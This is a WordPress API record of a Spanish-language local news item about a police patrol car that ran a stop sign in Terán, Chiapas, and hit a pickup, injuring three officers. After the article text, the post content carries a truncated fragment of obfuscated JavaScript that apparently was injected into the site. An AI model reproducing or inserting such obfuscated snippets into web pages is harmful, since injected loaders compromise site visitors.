{"id":20237,"date":"2025-02-07T03:53:17","date_gmt":"2025-02-07T03:53:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20237"},"modified":"2025-02-07T03:53:17","modified_gmt":"2025-02-07T03:53:17","slug":"patrulla-choca-contra-particular-en-teran","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20237","title":{"rendered":"Patrulla choca contra particular en Ter\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250206-WA0043-1024x768.jpg\" alt=\"\" class=\"wp-image-20238\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250206-WA0043-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250206-WA0043-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250206-WA0043-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250206-WA0043.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 6 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este jueves, una patrulla de la Secretar\u00eda de Seguridad P\u00fablica y Tr\u00e1nsito Municipal choc\u00f3 contra una camioneta Mitsubishi de color blanco con gris, a la altura de la Avenida Central y 2a Oriente de Ter\u00e1n.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando la unidad oficial circulaba de Norte a Sur y al llegar al citado punto se pas\u00f3 el alto y gener\u00f3 la colisi\u00f3n.<\/p>\n\n\n\n<p>Por el choque las dos unidades resultaron con da\u00f1os y tres polic\u00edas resultaron con golpes.<\/p>\n\n\n\n<p>Los lesionados fueron atendidos por param\u00e9dicos de Protecci\u00f3n Civil del Estado, la patrulla se dirig\u00eda a una emergencia.<\/p>\n\n\n\n<p>Finalmente los conductores llegaron a un acuerdo armonioso y se retiraron del lugar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 6 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este jueves, una patrulla de la Secretar\u00eda de Seguridad P\u00fablica y Tr\u00e1nsito Municipal choc\u00f3 contra una camioneta Mitsubishi de color blanco con gris, a la altura de la Avenida Central y 2a Oriente de Ter\u00e1n. De acuerdo con los reportes oficiales este hecho &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20238,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20237","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20237","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20237"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20237\/revisions"}],"predecessor-version":[{"id":20239,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20237\/revisions\/20239"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20238"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20237"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20237"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20237"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}